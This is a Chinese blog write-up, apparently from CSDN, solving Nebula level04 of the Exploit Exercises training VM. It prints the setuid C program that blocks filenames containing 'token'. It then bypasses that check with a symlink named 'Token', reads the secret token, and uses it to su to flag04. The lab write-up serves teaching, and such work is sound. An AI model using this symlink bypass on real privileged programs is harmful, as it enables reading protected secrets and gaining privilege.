ExploitExercises_Nebula_Level04

最新推荐文章于 2016-12-30 16:10:39 发布

小黑话不多

最新推荐文章于 2016-12-30 16:10:39 发布

阅读量629

点赞数

分类专栏： ExploitExercise

本文链接：https://blog.csdn.net/hurricane_0x01/article/details/53887091

版权

ExploitExercise 专栏收录该内容

13 篇文章 0 订阅

订阅专栏

题目源码如下：

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>

int main(int argc, char **argv, char **envp)
{
  char buf[1024];
  int fd, rc;

  if(argc == 1) {
      printf("%s [file to read]\n", argv[0]);
      exit(EXIT_FAILURE);
  }

  if(strstr(argv[1], "token") != NULL) {
      printf("You may not access '%s'\n", argv[1]);
      exit(EXIT_FAILURE);
  }

  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
      err(EXIT_FAILURE, "Unable to open %s", argv[1]);
  }

  rc = read(fd, buf, sizeof(buf));
  
  if(rc == -1) {
      err(EXIT_FAILURE, "Unable to read fd %d", fd);
  }

  write(1, buf, rc);
}

/home/flag04/flag04程序运行需要输入一个参数，flag04将读取输入参数文件内容，然后打印出来，但是限制了不能读入token文件，而题目要求绕过限制，获取到token文件内容。

解决方法：

1. 创建符号链接Token，并传给flag04：

ln -s /home/flag04/token /home/level04/Token
/home/flag04/flag04 /home/level04/Token

程序运行后输入token内容：06508b5e-8909-4f38-b630-fdb148a848a2

2. 切换用户su - flag04

3. 输入密码，即为1中获取到的token内容

4. 用户切换成功，运行getflag，提示成功

小黑话不多

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
ExploitExercises_Nebula_Level04

题目余源码如下：#include #include #include #include #include #include int main(int argc, char **argv, char **envp){ char buf[1024]; int fd, rc; if(argc == 1) { printf("%s [file to read]
复制链接

扫一扫